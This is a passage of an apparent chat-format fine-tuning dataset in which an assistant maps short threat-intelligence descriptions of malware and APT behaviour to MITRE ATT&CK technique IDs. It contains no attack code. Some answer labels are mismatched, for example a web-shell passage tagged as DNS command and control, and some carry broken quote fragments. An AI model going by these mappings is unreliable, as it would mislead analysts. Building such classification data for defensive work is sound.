- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used RDP connections to move across the victim network."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DnsSystem can direct queries to custom DNS servers and return C2 commands using TXT records."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used a Batch file to automate frequently executed post compromise cleanup activities. FIN8 has also executed commands remotely via cmd."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat has installed shim databases in the \"AppPatch\" folder."
- },
- {
- "role": "assistant",
- "content": "T1546.011 - Event Triggered Execution: Application Shimming"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has collected files from a local victim."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FALLCHILL has been installed as a Windows service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware can create a .lnk file and add a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before being sent to the server, the data structure has to pass through shaping as shown in Fig"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper will delete itself at the end of the process"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To ensure that the compromised system is unable to restore from backup, REvil deletes shadow copies and disables recovery mode by executing the following command via ShellExecute. The length and uniqueness of this command allow for the development of high-fidelity detection controls"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to retrieve information about connected users."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1566.002 - Phishing: Spearphishing Link', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This document uses KernelCallbackTable as well to hijack the control flow just like our first module, the injection technique used by the shellcode also resembles the first document. The major difference in this document is that it tries to retrieve a remote HTML page and then executes it using mshta.exe. The remote HTML page is located at https[:]//markettrendingcenter[.]com/member.htm and throws a 404 Not Found which makes it difficult for us to analyze this document any further"
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains and saves information about victim network interfaces and addresses."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MCMD can Base64 encode output strings prior to sending to C2."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack can shutdown and reboot the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kasidet has the ability to search for a given filename on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon creates several tasks for later execution to continue persistence on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used keyloggers that are also capable of dumping credentials."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "apparently altered samples by adding four bytes of random letters in a likely attempt to change the file hashes."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has queried the registry to detect recent PuTTY sessions."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses FTP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the attackers need to send a file or command to the victim machine, they place them to the folder named d in the victim’s Dropbox folder. The malware retrieves this folder and downloads all its contents to the working folder"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging', 'T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macOS version of the malicious application is a DMG Installer that has a disk image format that Apple commonly uses to distribute software over the internet. The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). It has very similar functionality to the Windows version"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All strings used by the Trojan are encrypted with the XOR algorithm"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cannon can take a screenshot of the desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used WMI to collect information about target machines."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attempted to blend in with a file name that matched the system name it resided on - Configured for persistence via a crontab entry with a @reboot line - Used likely compromised infrastructure for C2"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore can install malicious browser extensions that are used to hijack user searches."
- },
- {
- "role": "assistant",
- "content": "T1176 - Browser Extensions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can collect DNS information from the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PrivateLoader is yet another example of a Pay-Per-Install malicious loader like LgoogLoader and SmokeLoader. It uses a single-byte XOR encryption key to receive URLs from the control center."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman uses HTTPS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can modify file or directory timestamps."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has downloaded additional malware and tools onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The persistence mechanisms also change, offering the options to use XDG Autostart Entries and crontabs for persistence. We’ve waxed lyrical about crontabs before, but we haven’t explored XDG Autostart Entries in detail"
- },
- {
- "role": "assistant",
- "content": "T1547.013 - XDG Autostart Entries"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has used regsvr32.exe to execute malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As a result of all these steps, the last-stage Trojan is injected into svchost.exe’s process memory"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM runs its core DLL file using rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The White Company has used phishing lure documents that trick users into opening them and infecting their computers."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to take screenshots of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT can check for blocklisted process names on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the third phase of the operation, the attackers harvested credentials stored on the compromised machines and performed lateral movement and infected new machines. The attackers also introduced a very rare and stealthy technique to communicate with their servers and exfiltrate data using Microsoft Outlook"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "enumerates local and domain users"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords"
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors downloaded files and tools onto a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remember, Downadup/Conficker spread so widely because so many computers simply did not have a simple security patch, released months before the infections ever started, applied. Weafer ). - Use a robust security software suite that has multiple layers of protection. Even patched systems are continuing to become infected with the .A and .B variants. In many instances, this is occurring because the worm is being passed on via infected removable media, such as USB thumb drives, that are essentially acting as host carriers. Need to Know) - Use caution when opening attachments and accepting file transfers. Use caution when clicking on links to Web pages. Use strong passwords"
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used Empire to enumerate hosts and gather username, machine name, and administrative permissions information."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SoreFang can enumerate processes on a victim machine through use of Tasklist."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the user enables macros, the macro will perform the following actions: Displays decoy content Checks for the existence of a file at %APPDATA%\\wscript.exe If %APPDATA%\\wscript.exe does not exist, the macro converts an embedded hex-encoded string into bytes and saves this data to the %APPDATA%\\wscript.exe"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used base64 encoding and ECDH-P256 encryption for scripts and files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windows system WMI data is stored in the WMI common information model (CIM) repository, which consists of several files in the System32\\wbem\\Repository directory"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used Comodo code-signing certificates."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If this is successful, the malware creates a :0 alternate data stream in the executable and copies the executable’s own contents to the stream. This can be used to restore the executable later. Then the malware replaces the contents of the executable with a copy of itself and launches the service. The file modified time of the executable is also artificially changed to 00:00:00 UTC. The purpose of this time change is so the file can be identified and restored by the decryption tool"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain running services on the victim."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut code modules use various API functions to load and inject code."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used legitimate process names to hide malware including \"svchosst\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A 2 plug-in uses WMI to gather victim host details."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Two modifications are made to UPX version 3.91: The magic bytes UPX! in the UPX header are replaced with ASS7, The decompressed code and strings sections are XORed with 0x01"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can inject a suspended thread of its own process into a new process and initiate via the \"ResumeThread\" API."
- },
- {
- "role": "assistant",
- "content": "T1055.003 - Thread Execution Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NBTscan can dump and print whole packet content."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used cmd.exe for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "13 Copy file to adbFle.tmp, and upload it to the C2"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay has PE data embedded within JPEG files contained within Word documents."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lurid performs XOR encryption."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy has used SEAL encryption during the initial C2 handshake."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors use the Hunter tool to conduct network service discovery for vulnerable systems."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware gathers passwords from multiple sources, including Internet Explorer, Firefox, and Chrome."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BloodHound can use .NET API calls in the SharpHound ingestor component to pull Active Directory data."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
